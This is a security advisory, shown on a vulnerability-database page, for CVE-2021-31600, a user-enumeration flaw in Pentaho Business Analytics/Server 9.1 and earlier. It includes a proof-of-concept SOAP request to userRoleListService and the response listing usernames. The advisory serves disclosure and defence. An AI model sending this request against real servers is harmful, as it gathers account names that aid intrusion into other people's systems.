Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAltion MalkaPACKETSTORM:164787
HistoryNov 05, 2021 - 12:00 a.m.

Pentaho Business Analytics / Pentaho Business Server 9.1 User Enumeration

2021-11-0500:00:00
Altion Malka
packetstormsecurity.com
365
JSON
`Product: Pentaho Business Analytics / Pentaho Business Server  
Vendor / Manufacturer: Hitachi Vantara  
Affected Version(s): <= 9.1  
Vulnerability Type: Jackrabbit User Enumeration  
Solution Status: Fix Released on public GitHub repository  
Manufacturer Notification: 8th February 2021  
Solution Date: Wont fix  
Public Disclosure: 01 November 2021  
CVE Reference: CVE-2021-31600  
Author(s) of Advisory: Alberto Favero ( HawSec ) & Altion Malka  
  
--- ### --- ### ---  
  
Product Description:  
  
Pentaho is business intelligence (BI) software that provides data  
integration, OLAP services, reporting, information dashboards, data mining  
and extract, transform, load (ETL) capabilities. Its headquarters are in  
Orlando, Florida. Pentaho was acquired by Hitachi Data Systems in 2015 and  
in 2017 became part of Hitachi Vantara.  
  
( Source: https://en.wikipedia.org/wiki/Pentaho )  
  
--- ### --- ### ---  
  
Vulnerability Details:  
  
Pentaho implements a series of web services using the SOAP protocol to  
allow scripting interaction with the backend server. HAWSEC identified that  
the services userRoleListService and ServiceAction exposed through the  
"/pentaho/webservices/userRoleListService" and  
"/pentaho/ServiceAction?action=SecurityDetails" endpoints are not enforcing  
sufficient access controls. Specifically, an authenticated user can list  
all application usernames present in the Jackrabbit Repository.  
  
--- ### --- ### ---  
  
Proof of Concept (PoC):  
  
See Ginger ( https://github.com/HawSec/ginger )  
  
or  
  
--- ~~~ --- ~~~ ---  
POST /pentaho/webservices/userRoleListService HTTP/1.1  
Host: localhost:8080  
Connection: close  
Cookie: JSESSIONID=878BCFF82EC40D06F72D64172CAC98B4;  
SOAPAction:  
Content-Type: text/xml; charset=UTF-8  
Content-Length: 244  
<soapenv:Envelope  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:ws="http://ws.userrole.security.platform.pentaho.org/">  
<soapenv:Header/>  
<soapenv:Body>  
<ws:getAllUsers/>  
</soapenv:Body>  
</soapenv:Envelope>  
  
  
HTTP/1.1 200  
Content-Type: text/xml;charset=utf-8  
Connection: close  
Content-Length: 353  
<?xml version='1.0' encoding='UTF-8'?>  
<S:Envelope  
xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">  
<S:Body>  
<ns2:getAllUsersResponse  
xmlns:ns2="http://ws.userrole.security.platform.pentaho.org/">  
<return>pat</return>  
<return>test</return>  
<return>suzy</return>  
<return>admin</return>  
<return>tiffany</return>  
</ns2:getAllUsersResponse>  
</S:Body>  
</S:Envelope>  
--- ~~~ --- ~~~ ---  
  
--- ### --- ### ---  
  
  
Credits:  
  
This vulnerability was discovered by Alberto Favero & Altion Malka  
  
--- ### --- ### ---  
  
  
  
  
--   
BlackHawk - [email protected]  
  
Experientia senum, agilitas iuvenum.  
Adversa fortiter. Dubia prudenter.  
  
  
`

Related

cnvd 1
zdt 1
prion 1
cve 1
thn 1
cnvd
cnvd
Hitachi Vantara Pentaho Access Control Error Vulnerability
2021-11-09 00:00:00
zdt
zdt
Pentaho Business Analytics / Pentaho Business Server 9.1 User Enumeration Vulnerability
2021-11-07 00:00:00
prion
prion
Design/Logic Flaw
2021-11-08 04:15:00
cve
cve
CVE-2021-31600
2021-11-08 04:15:00
thn
thn
Critical Flaws Uncovered in Pentaho Business Analytics Software
2021-11-01 12:08:00
JSON
Related for PACKETSTORM:164787
cnvd1zdt1prion1cve1thn1